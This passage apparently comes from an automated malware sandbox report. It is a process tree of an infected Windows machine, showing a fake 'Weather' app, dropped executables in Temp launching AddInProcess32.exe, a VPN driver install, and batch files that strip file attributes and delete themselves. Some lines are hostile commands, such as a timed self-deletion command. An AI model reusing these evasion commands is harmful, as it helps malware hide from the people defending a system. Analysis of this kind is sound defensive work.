                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1744,18421795784715757521,18195477919350953581,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1540_1993498563" --mojo-platform-channel-handle=1868 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4532
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1744,18421795784715757521,18195477919350953581,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1540_1993498563" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2600 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6616
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1744,18421795784715757521,18195477919350953581,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1540_1993498563" --mojo-platform-channel-handle=2276 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                        PID:7660
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1744,18421795784715757521,18195477919350953581,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1540_1993498563" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1816 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                          PID:2176
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1744,18421795784715757521,18195477919350953581,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1540_1993498563" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2644 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                            PID:4480
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1744,18421795784715757521,18195477919350953581,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1540_1993498563" --mojo-platform-channel-handle=2724 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                              PID:6744
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1744,18421795784715757521,18195477919350953581,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1540_1993498563" --mojo-platform-channel-handle=3400 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                PID:7640
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1744,18421795784715757521,18195477919350953581,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1540_1993498563" --mojo-platform-channel-handle=1860 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:4372
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1744,18421795784715757521,18195477919350953581,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1540_1993498563" --mojo-platform-channel-handle=3436 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6992
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1744,18421795784715757521,18195477919350953581,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1540_1993498563" --mojo-platform-channel-handle=1688 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:7208
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE1072.bat" "
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6032
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                      PID:1196
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                      PID:4960
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE1072.bat"
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                      PID:4568
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:3740
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE1072.bat" "
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:7944
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE10B1.bat" "
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:8156
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                            PID:5224
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                            PID:5644
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                            PID:8128
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE10B1.bat"
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                            PID:8164
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE10B1.bat" "
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5472
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:4960
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                          PID:5540
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:3552
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                            PID:6956
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6344
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1156
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:8172
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:4576
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:4260
                                                                                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:5164
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                                                          DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{6b6f5ea4-8a05-484f-9f1d-7437e0a4ff53}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:6000
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                                                            DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000178"
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:6016
                                                                                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:7820
                                                                                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:7320
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:7448
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                                                    MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:6732
                                                                                                                                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:7860
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:68
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BA15.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\BA15.exe
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:7924
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\BEE8.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\BEE8.exe
                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:2792
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D3C9.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\D3C9.exe
                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:4516
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\D3C9.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6040
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7436
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DA71.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\DA71.exe
                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6008
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E39A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E39A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5512
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5184
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6036
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F7A0.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F7A0.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1192
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5096
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\A9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\A9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:208
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DAA.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\DAA.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7284
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8108
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5068
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7052
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5216
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6304
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5720
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6652
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6068
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7460
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7760
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7008
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 7008 -s 1672
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5192
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
